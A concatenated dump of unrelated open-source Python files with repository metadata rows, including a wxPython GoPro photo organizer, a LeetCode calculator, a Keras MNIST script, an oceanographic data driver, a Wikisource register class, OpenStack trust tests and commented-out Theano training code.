common_command += " --dual_core 0"
common_command += " --dolphin --exe dolphin-emu-headless"
common_command += " --zmq 1 --pipe_count 1"
common_command += " --random_swap"
# common_command += " --help"
common_command += " --enemy_dump 1 --enemy_reload 1"
base_name = "actor_" + params['name']
if pop_id >= 0:
base_name += "_%d" % pop_id
common_command += " --pop_id %d" % pop_id
for i, enemy_command in enumerate(enemy_commands):
name = base_name + "_%d" % i
full_command = common_command + enemy_command
launch(
args, name, full_command,
log=args.log_agents,
qos='use-everything' if args.use_everything else None,
array=actors_per_enemy,
depends=trainer_depends,
pids=pids,
)
if run_agents_b:
for agent_args in agents:
run_agents(*agent_args)
if args.local:
with open(args.path + '/pids', 'w') as f:
for p in pids:
f.write(str(p) + ' ')
| gpl-3.0 | 3,765,404,798,221,629,400 | 22.546053 | 74 | 0.628667 | false |
angusmacdonald/gopro-organizer | organizerui/view.py | 1 | 7376 | import wx
from os.path import expanduser
import logging
import threading
from configobj import ConfigObj
config = ConfigObj("default.conf", unrepr=True)
lock = threading.Lock()
class OrganizerView(wx.Frame):
def __init__(self, parent, title):
super(OrganizerView, self).__init__(parent, title=title,
size=(400, 530))
self.InitUI()
self.Centre()
self.Show()
def InitUI(self):
panel = wx.Panel(self)
# Menu
menubar = wx.MenuBar()
fileMenu = wx.Menu()
fitem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
self.SetMenuBar(menubar)
self.Bind(wx.EVT_MENU, self.OnClose, fitem)
# Main Body
font = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
fontItalic = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
fontItalic = fontItalic.MakeItalic()
self.fontHeading = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
self.fontHeading.SetPointSize(18)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((10,10))
# Heading 1
heading1 = self.createHeading(panel, 'Media Location')
vbox.Add(heading1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT, border=10)
# Input
self.inputPathLabel = wx.StaticText(panel, label='Input Directory ')
self.inputPathLabel.SetToolTip(
wx.ToolTip('All GoPro photos in this directory and all sub-directories will be copied.'))
self.inputPathLabel.SetFont(font)
self.inputPathText = wx.TextCtrl(panel)
self.inputPathText.SetValue(expanduser("~"))
btnInputDir = wx.Button(panel, label='...', size=(40, 20))
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox1.Add(self.inputPathLabel, flag=wx.RIGHT, border=8)
hbox1.Add(self.inputPathText, proportion=1, border=8)
hbox1.Add(btnInputDir, flag=wx.LEFT|wx.RIGHT, border=10)
vbox.Add(hbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)
# Output
self.outputPath = wx.StaticText(panel, label='Output Directory')
self.outputPath.SetFont(font)
self.outputPath.SetToolTip(
wx.ToolTip('Where all GoPro photos will be moved/copied.'))
self.outputPathText = wx.TextCtrl(panel)
self.outputPathText.SetValue(expanduser("~"))
btnOutputDir = wx.Button(panel, label='...', size=(40, 20))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
hbox2.Add(self.outputPath, flag=wx.RIGHT, border=8)
hbox2.Add(self.outputPathText, proportion=1, flag=wx.RIGHT)
hbox2.Add(btnOutputDir,flag=wx.LEFT|wx.RIGHT, border=10)
vbox.Add(hbox2, flag=wx.LEFT | wx.TOP | wx.RIGHT | wx.EXPAND, border=10)
# Start button
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
self.btnStartOrganizing = wx.Button(panel, label='Start Organizing', size=(400, 30))
hbox5.Add(self.btnStartOrganizing)
vbox.Add(hbox5, flag=wx.EXPAND | wx.RIGHT | wx.LEFT, border=10)
# Options
vbox.Add(self.createHeading(panel, 'Settings'),
flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=5)
# Include THM and LRV files
hbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.chkIncludeThmLrv = wx.CheckBox(panel, label='Include THM and LRV Files.')
self.chkIncludeThmLrv.SetFont(font)
self.chkIncludeThmLrv.SetValue(True)
hbox4.Add(self.chkIncludeThmLrv)
vbox.Add(hbox4, flag=wx.LEFT, border=10)
# Copy or move?
hbox45 = wx.BoxSizer(wx.HORIZONTAL)
self.chkCopyFiles = wx.CheckBox(panel,
label='Copy files (move files if unchecked).')
self.chkCopyFiles.SetFont(font)
self.chkCopyFiles.SetValue(True)
hbox45.Add(self.chkCopyFiles)
vbox.Add(hbox45, flag=wx.LEFT, border=10)
# Store in date sub-directory option:
hbox46 = wx.BoxSizer(wx.HORIZONTAL)
self.chkDateSubDirs = wx.CheckBox(panel,
label='Store items in sub-directories named by date taken.')
self.chkDateSubDirs.SetFont(font)
self.chkDateSubDirs.SetValue(True)
hbox46.Add(self.chkDateSubDirs)
vbox.Add(hbox46, flag=wx.LEFT, border=10)
# Rename files option:
hbox47 = wx.BoxSizer(wx.HORIZONTAL)
self.chkChangeFileNameFormat = wx.CheckBox(panel,
label='Rename files to the following date format:')
self.chkChangeFileNameFormat.SetToolTip(
wx.ToolTip('The format of this pattern is described in the supplied documentation.'))
self.chkChangeFileNameFormat.SetFont(font)
self.chkChangeFileNameFormat.SetValue(False)
hbox47.Add(self.chkChangeFileNameFormat)
vbox.Add(hbox47, flag=wx.LEFT, border=10)
# Date regex for file naming:
hbox48 = wx.BoxSizer(wx.HORIZONTAL)
self.fileNameFormat = wx.TextCtrl(panel)
self.fileNameFormat.Enable(False)
self.fileNameFormat.SetValue(config['date_naming_format'])
hbox48.Add(self.fileNameFormat, proportion=1, border=8)
vbox.Add(hbox48, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=30)
# Status Box
vbox.Add(self.createHeading(panel, 'Status'),
flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)
hbox6 = wx.BoxSizer(wx.HORIZONTAL)
self.statusUpdates = wx.TextCtrl(panel, -1,"Waiting for input...\n",
size=(400, 200), style=wx.TE_MULTILINE | wx.TE_READONLY)
hbox6.Add(self.statusUpdates)
vbox.Add(hbox6, flag=wx.ALIGN_RIGHT|wx.RIGHT|wx.LEFT|wx.EXPAND, border=10)
panel.SetSizer(vbox)
self.chkCopyFiles.Bind(wx.EVT_CHECKBOX, self.OnChkCopyFile)
self.chkChangeFileNameFormat.Bind(wx.EVT_CHECKBOX, self.OnChkFileNameFormat)
btnInputDir.Bind(wx.EVT_BUTTON, self.OnInputPathDir)
btnOutputDir.Bind(wx.EVT_BUTTON, self.OnOutputPathDir)
def createHeading(self, panel, headingText):
hbox = wx.BoxSizer(wx.HORIZONTAL)
pathHeading = wx.StaticText(panel, label=headingText)
pathHeading.SetFont(self.fontHeading)
hbox.Add(pathHeading, flag=wx.RIGHT|wx.EXPAND, border=0)
return hbox
def createExplainerLine(self, panel, font, label_text):
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.inputDescriptionLabel = wx.StaticText(panel, label=label_text)
self.inputDescriptionLabel.SetFont(font)
hbox.Add(self.inputDescriptionLabel, flag=wx.RIGHT|wx.EXPAND, border=8)
return hbox
def OnChkCopyFile(self, event):
if not event.IsChecked():
dial = wx.MessageDialog(None,
'Are you sure? Disabling copy means that files are removed from their source location.', 'Disable copy?',
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
retCode = dial.ShowModal()
if (retCode != wx.ID_YES):
self.chkCopyFiles.SetValue(True)
dial.Destroy()
def OnChkFileNameFormat(self, event):
self.fileNameFormat.Enable(event.IsChecked())
def OnInputPathDir(self, event):
text = "Choose the directory containing your GoPro photos:"
dir = self.chooseDirectory(text)
self.inputPathText.SetValue(dir)
def OnOutputPathDir(self, event):
text = "Choose the directory where the files should be copied:"
dir = self.chooseDirectory(text)
self.outputPathText.SetValue(dir)
def chooseDirectory(self, text):
response = ""
dialog = wx.DirDialog(None, text,style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if dialog.ShowModal() == wx.ID_OK:
response = dialog.GetPath()
dialog.Destroy()
return response
def AddMessage(self, message):
lock.acquire()
try:
logging.debug("Incoming message: {}".format(message))
newStatus = "{}\n".format(message)
wx.CallAfter(self.statusUpdates.AppendText, newStatus)
finally:
lock.release() # release lock, no matter what
def OnClose(self, event):
self.Close()
if __name__ == '__main__':
appName = "GoPro Organizer"
app = wx.App()
app.SetAppName(appName) # Used in OSx app menu
OrganizerView(None, title=appName)
app.MainLoop() | mit | 2,095,757,634,949,805,800 | 28.626506 | 110 | 0.720445 | false |
luozhaoyu/leetcode | calcu.py | 1 | 1777 | class Symbol(object):
def __init__(self, value, pre=None, succ=None):
self.value = value
self.pre = pre
self.succ = succ
class Solution:
# @param {string} s
# @return {integer}
def calculate(self, s):
s = s.replace(" ", "")
head = Symbol(None)
current = head
tmp = ""
highs = []
lows = []
for c in s:
if c.isdigit():
tmp += c
else:
if tmp:
s = Symbol(int(tmp), pre=current)
current.succ = s
current = s
tmp = ""
s = Symbol(c, pre=current)
current.succ = s
current = s
if c == '*' or c == '/':
highs.append(s)
else:
lows.append(s)
if tmp:
s = Symbol(int(tmp), pre=current)
current.succ = s
current = s
for h in highs:
if h.value == '*':
h.pre.value = h.pre.value * h.succ.value
else:
h.pre.value = h.pre.value / h.succ.value
h.pre.succ = h.succ.succ
if h.succ.succ:
h.succ.succ.pre = h.pre
for h in lows:
if h.value == '+':
h.pre.value = h.pre.value + h.succ.value
else:
h.pre.value = h.pre.value - h.succ.value
h.pre.succ = h.succ.succ
if h.succ.succ:
h.succ.succ.pre = h.pre
return head.succ.value
so = Solution()
l = [
"1+1+1",
"1-11",
"3+2*2",
" 3/2 ",
" 3+5 / 2 ",
"1",
"111",
"111 / 2 + 3 * 3",
]
for s in l:
print s, so.calculate(s)
| mit | 751,166,453,840,263,700 | 22.693333 | 56 | 0.396173 | false |
mvpossum/deep-learning | tp2/ej2ai.py | 1 | 1839 | '''Trains a simple deep NN on the MNIST dataset.
Gets to 98.40% test accuracy after 20 epochs
(there is *a lot* of margin for parameter tuning).
2 seconds per epoch on a K520 GPU.
'''
from __future__ import print_function
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD, Adam, RMSprop
from keras.utils import np_utils
batch_size = 128
nb_classes = 10
nb_epoch = 5
# the data, shuffled and split between train and test sets
(X_train, y_train), (X_test, y_test) = mnist.load_data()
train_len = int(X_train.shape[0]*.25)
X_train, y_train = X_train[:train_len], y_train[:train_len]
X_train = X_train.reshape(train_len, 784)
X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Dense(10, input_shape=(784,)))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
| mit | -2,993,582,487,547,231,700 | 28.190476 | 64 | 0.699293 | false |
oceanobservatories/mi-instrument | mi/dataset/driver/ctdpf_ckl/wfp/ctdpf_ckl_wfp_driver.py | 1 | 2824 | #!/usr/local/bin/python2.7
##
# OOIPLACEHOLDER
#
# Copyright 2020 Raytheon Co.
##
import os
from mi.core.versioning import version
from mi.dataset.dataset_driver import SimpleDatasetDriver, ParticleDataHandler
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.ctdpf_ckl_wfp import CtdpfCklWfpParser, \
METADATA_PARTICLE_CLASS_KEY, \
DATA_PARTICLE_CLASS_KEY
from mi.dataset.parser.wfp_c_file_common import WfpCFileCommonConfigKeys
from mi.dataset.parser.ctdpf_ckl_wfp_particles import \
CtdpfCklWfpTelemeteredDataParticle, \
CtdpfCklWfpTelemeteredMetadataParticle, \
CtdpfCklWfpDataParticleKey
from mi.core.log import get_logger
log = get_logger()
class CtdpfCklWfpDriver(SimpleDatasetDriver):
"""
Derived wc_wm_cspp driver class
All this needs to do is create a concrete _build_parser method
"""
def __init__(self, unused, stream_handle, particle_data_handler, e_file_time_pressure_tuples):
self._e_file_time_pressure_tuples = e_file_time_pressure_tuples
super(CtdpfCklWfpDriver, self).__init__(unused, stream_handle, particle_data_handler)
def _build_parser(self, stream_handle):
parser_config = {
WfpCFileCommonConfigKeys.PRESSURE_FIELD_C_FILE: CtdpfCklWfpDataParticleKey.PRESSURE,
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
METADATA_PARTICLE_CLASS_KEY: CtdpfCklWfpTelemeteredMetadataParticle,
DATA_PARTICLE_CLASS_KEY: CtdpfCklWfpTelemeteredDataParticle
}
}
file_size = os.path.getsize(stream_handle.name)
parser = CtdpfCklWfpParser(parser_config,
stream_handle,
self._exception_callback,
file_size,
self._e_file_time_pressure_tuples)
return parser
@version("0.0.1")
def parse(unused, source_file_path, particle_data_handler):
"""
This is the method called by Uframe
:param unused
:param source_file_path This is the full path and filename of the file to be parsed
:param particle_data_handler Java Object to consume the output of the parser
:return particle_data_handler
"""
# Let this be None until we modify the global E file driver to get these tuples
e_file_time_pressure_tuples = None
# Parse the ctd file and use the e_file_time_pressure_tuples to generate
# the internal timestamps of the particles
with open(source_file_path, 'rb') as stream_handle:
driver = CtdpfCklWfpDriver(
unused, stream_handle, particle_data_handler, e_file_time_pressure_tuples)
driver.processFileStream()
return particle_data_handler
| bsd-2-clause | -6,805,808,115,779,619,000 | 34.746835 | 98 | 0.686615 | false |
the-it/WS_THEbotIT | service/ws_re/register/register_types/volume.py | 1 | 4464 | import json
from typing import Union, Optional, List
from service.ws_re.register._base import Register, _REGISTER_PATH
from service.ws_re.register._typing import LemmaDict
from service.ws_re.register.authors import Authors
from service.ws_re.register.lemma import Lemma
from service.ws_re.volumes import Volume, Volumes
class VolumeRegister(Register):
_REGISTER_PATH = _REGISTER_PATH
def __init__(self, volume: Volume, authors: Authors):
super().__init__()
self._authors = authors
self._volume = volume
with open(self._REGISTER_PATH.joinpath(f"{volume.file_name}.json"),
"r", encoding="utf-8") as json_file:
lemma_list = json.load(json_file)
for lemma in lemma_list:
self._lemmas.append(Lemma(lemma, self._volume, self._authors))
def __repr__(self):
return f"<{self.__class__.__name__} - volume:{self.volume.name}, lemmas:{len(self.lemmas)}>"
def __len__(self):
return len(self._lemmas)
@property
def volume(self) -> Volume:
return self._volume
@property
def authors(self) -> Authors:
return self._authors
@property
def lemmas(self) -> List[Lemma]:
return self._lemmas
def _get_table(self) -> str:
header = """{|class="wikitable sortable"
!Artikel
!Status
!Wikilinks
!Seite
!Autor
!Sterbejahr"""
table = [header]
for lemma in self._lemmas:
table.append(lemma.get_table_row())
table.append("|}")
return "\n".join(table)
def _get_header(self) -> str:
header = ["RERegister"]
header.append(f"BAND={self.volume.name}")
# calculate pre and post issue
volumes = Volumes()
vg, nf = volumes.get_neighbours(self.volume.name)
header.append(f"VG={vg}")
header.append(f"NF={nf}")
header.append(f"SUM={len(self.lemmas)}")
# calculate proof_read status
fer, kor, unk = self.proof_read
header.append(f"UNK={unk}")
header.append(f"KOR={kor}")
header.append(f"FER={fer}")
return "{{" + "\n|".join(header) + "\n}}\n"
def _get_footer(self) -> str:
return f"[[Kategorie:RE:Register|!]]\nZahl der Artikel: {len(self._lemmas)}, " \
f"davon [[:Kategorie:RE:Band {self._volume.name}" \
f"|{{{{PAGESINCATEGORY:RE:Band {self._volume.name}|pages}}}} in Volltext]]."
def get_register_str(self) -> str:
return f"{self._get_header()}\n{self._get_table()}\n{self._get_footer()}"
def persist(self):
persist_list = []
for lemma in self.lemmas:
persist_list.append(lemma.lemma_dict)
with open(self._REGISTER_PATH.joinpath("{}.json".format(self._volume.file_name)),
"w", encoding="utf-8") as json_file:
json.dump(persist_list, json_file, indent=2, ensure_ascii=False)
def __getitem__(self, idx: int) -> Lemma:
return self.lemmas[idx]
def get_lemma_by_name(self, lemma_name: str, self_supplement: bool = False) -> Optional[Lemma]:
found_before = False
for lemma in self.lemmas:
if lemma["lemma"] == lemma_name:
if found_before or not self_supplement:
return lemma
found_before = True
return None
def get_lemma_by_sort_key(self, sort_key: str, self_supplement: bool = False) -> Optional[Lemma]:
# normalize it
sort_key = Lemma.make_sort_key(sort_key)
found_before = False
for lemma in self.lemmas:
if lemma.sort_key == sort_key:
if found_before or not self_supplement:
return lemma
found_before = True
return None
def get_index_of_lemma(self, lemma_input: Union[str, Lemma], self_supplement: bool = False) -> Optional[int]:
if isinstance(lemma_input, str):
lemma = self.get_lemma_by_name(lemma_input, self_supplement)
else:
lemma = lemma_input
if lemma:
return self.lemmas.index(lemma)
return None
def __contains__(self, lemma_name: str) -> bool:
return bool(self.get_lemma_by_name(lemma_name))
@staticmethod
def normalize_sort_key(lemma_dict: LemmaDict) -> str:
if "sort_key" in lemma_dict:
return Lemma.make_sort_key(lemma_dict["sort_key"])
return Lemma.make_sort_key(lemma_dict["lemma"])
| mit | 3,885,164,164,905,527,300 | 34.149606 | 113 | 0.58983 | false |
openstack/python-openstackclient | openstackclient/tests/unit/identity/v3/test_trust.py | 1 | 8837 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.identity.v3 import trust
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
class TestTrust(identity_fakes.TestIdentityv3):
def setUp(self):
super(TestTrust, self).setUp()
self.trusts_mock = self.app.client_manager.identity.trusts
self.trusts_mock.reset_mock()
self.projects_mock = self.app.client_manager.identity.projects
self.projects_mock.reset_mock()
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
self.roles_mock = self.app.client_manager.identity.roles
self.roles_mock.reset_mock()
class TestTrustCreate(TestTrust):
def setUp(self):
super(TestTrustCreate, self).setUp()
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
self.roles_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.ROLE),
loaded=True,
)
self.trusts_mock.create.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
# Get the command object to test
self.cmd = trust.CreateTrust(self.app, None)
def test_trust_create_basic(self):
arglist = [
'--project', identity_fakes.project_id,
'--role', identity_fakes.role_id,
identity_fakes.user_id,
identity_fakes.user_id
]
verifylist = [
('project', identity_fakes.project_id),
('impersonate', False),
('role', [identity_fakes.role_id]),
('trustor', identity_fakes.user_id),
('trustee', identity_fakes.user_id),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class ShowOne in cliff, abstract method take_action()
# returns a two-part tuple with a tuple of column names and a tuple of
# data to be shown.
columns, data = self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'impersonation': False,
'project': identity_fakes.project_id,
'role_ids': [identity_fakes.role_id],
'expires_at': None,
}
# TrustManager.create(trustee_id, trustor_id, impersonation=,
# project=, role_names=, expires_at=)
self.trusts_mock.create.assert_called_with(
identity_fakes.user_id,
identity_fakes.user_id,
**kwargs
)
collist = ('expires_at', 'id', 'impersonation', 'project_id',
'roles', 'trustee_user_id', 'trustor_user_id')
self.assertEqual(collist, columns)
datalist = (
identity_fakes.trust_expires,
identity_fakes.trust_id,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.role_name,
identity_fakes.user_id,
identity_fakes.user_id
)
self.assertEqual(datalist, data)
class TestTrustDelete(TestTrust):
def setUp(self):
super(TestTrustDelete, self).setUp()
# This is the return value for utils.find_resource()
self.trusts_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
self.trusts_mock.delete.return_value = None
# Get the command object to test
self.cmd = trust.DeleteTrust(self.app, None)
def test_trust_delete(self):
arglist = [
identity_fakes.trust_id,
]
verifylist = [
('trust', [identity_fakes.trust_id])
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.take_action(parsed_args)
self.trusts_mock.delete.assert_called_with(
identity_fakes.trust_id,
)
self.assertIsNone(result)
@mock.patch.object(utils, 'find_resource')
def test_delete_multi_trusts_with_exception(self, find_mock):
find_mock.side_effect = [self.trusts_mock.get.return_value,
exceptions.CommandError]
arglist = [
identity_fakes.trust_id,
'unexist_trust',
]
verifylist = [
('trust', arglist),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
try:
self.cmd.take_action(parsed_args)
self.fail('CommandError should be raised.')
except exceptions.CommandError as e:
self.assertEqual('1 of 2 trusts failed to delete.',
str(e))
find_mock.assert_any_call(self.trusts_mock, identity_fakes.trust_id)
find_mock.assert_any_call(self.trusts_mock, 'unexist_trust')
self.assertEqual(2, find_mock.call_count)
self.trusts_mock.delete.assert_called_once_with(
identity_fakes.trust_id)
class TestTrustList(TestTrust):
def setUp(self):
super(TestTrustList, self).setUp()
self.trusts_mock.list.return_value = [
fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
),
]
# Get the command object to test
self.cmd = trust.ListTrust(self.app, None)
def test_trust_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
self.trusts_mock.list.assert_called_with()
collist = ('ID', 'Expires At', 'Impersonation', 'Project ID',
'Trustee User ID', 'Trustor User ID')
self.assertEqual(collist, columns)
datalist = ((
identity_fakes.trust_id,
identity_fakes.trust_expires,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.user_id,
identity_fakes.user_id
), )
self.assertEqual(datalist, tuple(data))
class TestTrustShow(TestTrust):
def setUp(self):
super(TestTrustShow, self).setUp()
self.trusts_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
# Get the command object to test
self.cmd = trust.ShowTrust(self.app, None)
def test_trust_show(self):
arglist = [
identity_fakes.trust_id,
]
verifylist = [
('trust', identity_fakes.trust_id),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class ShowOne in cliff, abstract method take_action()
# returns a two-part tuple with a tuple of column names and a tuple of
# data to be shown.
columns, data = self.cmd.take_action(parsed_args)
self.trusts_mock.get.assert_called_with(identity_fakes.trust_id)
collist = ('expires_at', 'id', 'impersonation', 'project_id',
'roles', 'trustee_user_id', 'trustor_user_id')
self.assertEqual(collist, columns)
datalist = (
identity_fakes.trust_expires,
identity_fakes.trust_id,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.role_name,
identity_fakes.user_id,
identity_fakes.user_id
)
self.assertEqual(datalist, data)
| apache-2.0 | -7,579,739,614,967,105,000 | 32.097378 | 79 | 0.595904 | false |
bluemellophone/ibeis_cnn | broken/old_batch.py | 1 | 5867 | #def create_sliced_iter_funcs_train2(model, X_unshared, y_unshared):
# """
# WIP: NEW IMPLEMENTATION WITH PRELOADING GPU DATA
# build the Theano functions (symbolic expressions) that will be used in the
# optimization refer to this link for info on tensor types:
# References:
# http://deeplearning.net/software/theano/library/tensor/basic.html
# http://deeplearning.net/software/theano/tutorial/aliasing.html#borrowing-when-creating-shared-variables
# http://deeplearning.net/tutorial/lenet.html
# # TODO: Deal with batching to the GPU by setting the value of the shared variables.
# CommandLine:
# python -m ibeis_cnn.batch_processing --test-create_sliced_iter_funcs_train2
# Example:
# >>> # DISABLE_DOCTEST
# >>> from ibeis_cnn.batch_processing import * # NOQA
# >>> from ibeis_cnn import draw_net
# >>> from ibeis_cnn import models
# >>> model = models.DummyModel(autoinit=True)
# >>> X_unshared, y_unshared = model.make_random_testdata()
# >>> train_iter = model.build_theano_funcs(model)
# >>> print(train_iter)
# >>> loss_train, newtork_output, prediction, accuracy = train_iter(0)
# >>> print('loss = %r' % (loss,))
# >>> print('net_out = %r' % (outvec,))
# >>> print('newtork_output = %r' % (newtork_output,))
# >>> print('accuracy = %r' % (accuracy,))
# >>> #draw_net.draw_theano_symbolic_expression(train_iter)
# >>> assert outvec.shape == (model.batch_size, model.output_dims)
# """
# # Attempt to load data on to the GPU
# # Labels to go into the GPU as float32 and then cast to int32 once inside
# X_unshared = np.asarray(X_unshared, dtype=theano.config.floatX)
# y_unshared = np.asarray(y_unshared, dtype=theano.config.floatX)
# X_shared = theano.shared(X_unshared, borrow=True)
# y_shared = T.cast(theano.shared(y_unshared, borrow=True), 'int32')
# # Build expressions which sample a batch
# batch_size = model.batch_size
# # Initialize symbolic input variables
# index = T.lscalar(name='index')
# X_batch = T.tensor4(name='X_batch')
# y_batch = T.ivector(name='y_batch')
# WHITEN = False
# if WHITEN:
# # We might be able to perform some data augmentation here symbolicly
# data_mean = X_unshared.mean()
# data_std = X_unshared.std()
# givens = {
# X_batch: (X_shared[index * batch_size: (index + 1) * batch_size] - data_mean) / data_std,
# y_batch: y_shared[index * batch_size: (index + 1) * batch_size],
# }
# else:
# givens = {
# X_batch: X_shared[index * batch_size: (index + 1) * batch_size],
# y_batch: y_shared[index * batch_size: (index + 1) * batch_size],
# }
# output_layer = model.get_output_layer()
# # Build expression to evalute network output without dropout
# #newtork_output = output_layer.get_output(X_batch, deterministic=True)
# newtork_output = layers.get_output(output_layer, X_batch, deterministic=True)
# newtork_output.name = 'network_output'
# # Build expression to evaluate loss
# objective = objectives.Objective(output_layer, loss_function=model.loss_function)
# loss_train = objective.get_loss(X_batch, target=y_batch) # + 0.0001 * lasagne.regularization.l2(output_layer)
# loss_train.name = 'loss_train'
# # Build expression to evaluate updates
# with warnings.catch_warnings():
# warnings.filterwarnings('ignore', '.*topo.*')
# all_params = lasagne.layers.get_all_params(output_layer, trainable=True)
# updates = lasagne.updates.nesterov_momentum(loss_train, all_params, model.learning_rate, model.momentum)
# # Get performance indicator outputs:
# # Build expression to convert network output into a prediction
# prediction = model.make_prediction_expr(newtork_output)
# # Build expression to compute accuracy
# accuracy = model.make_accuracy_expr(prediction, y_batch)
# theano_backprop = theano.function(
# inputs=[index],
# outputs=[loss_train, newtork_output, prediction, accuracy],
# updates=updates,
# givens=givens
# )
# theano_backprop.name += ':theano_backprob:indexed'
# #other_outputs = [probabilities, predictions, confidences]
# #theano_backprop = theano.function(
# # inputs=[theano.Param(X_batch), theano.Param(y_batch)],
# # outputs=[loss] + other_outputs,
# # updates=updates,
# # givens={
# # X: X_batch,
# # y: y_batch,
# # },
# #)
# #theano_forward = theano.function(
# # inputs=[theano.Param(X_batch), theano.Param(y_batch)],
# # outputs=[loss_determ] + other_outputs,
# # updates=None,
# # givens={
# # X: X_batch,
# # y: y_batch,
# # },
# #)
# #theano_predict = theano.function(
# # inputs=[theano.Param(X_batch)],
# # outputs=other_outputs,
# # updates=None,
# # givens={
# # X: X_batch,
# # },
# #)
# return theano_backprop
#def create_sliced_network_output_func(model):
# # Initialize symbolic input variables
# X_batch = T.tensor4(name='X_batch')
# # weird, idk why X and y exist
# X = T.tensor4(name='X_batch')
# output_layer = model.get_output_layer()
# # Build expression to evalute network output without dropout
# #newtork_output = output_layer.get_output(X_batch, deterministic=True)
# newtork_output = layers.get_output(output_layer, X_batch, deterministic=True)
# newtork_output.name = 'network_output'
# theano_forward = theano.function(
# inputs=[theano.Param(X_batch)],
# outputs=[newtork_output],
# givens={
# X: X_batch,
# }
# )
# theano_forward.name += ':theano_forward:sliced'
# return theano_forward
| apache-2.0 | 2,204,840,963,682,259,000 | 37.097403 | 115 | 0.623317 | false |
LowResourceLanguages/hltdi-l3 | l3xdg/node.py | 1 | 24288 | # Implementation of Extensible Dependency Grammar, as described in
# Debusmann, R. (2007). Extensible Dependency Grammar: A modular
# grammar formalism based on multigraph description. PhD Dissertation:
# Universität des Saarlandes.
#
########################################################################
#
# This file is part of the HLTDI L^3 project
# for parsing, generation, and translation within the
# framework of Extensible Dependency Grammar.
#
# Copyright (C) 2010, 2011, 2012, 2013, 2014
# by the HLTDI L^3 Team <gasser@cs.indiana.edu>
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# 2010.08.21 (MG)
# -- Node in a separate module.
# -- Node has a dict of dimensions with dimension-specific variables.
# -- Almost all variable creation now handled by principles.
# 2010.09.13 (MG)
# -- initialize now includes inheritance.
# 2010.10.17 (MG)
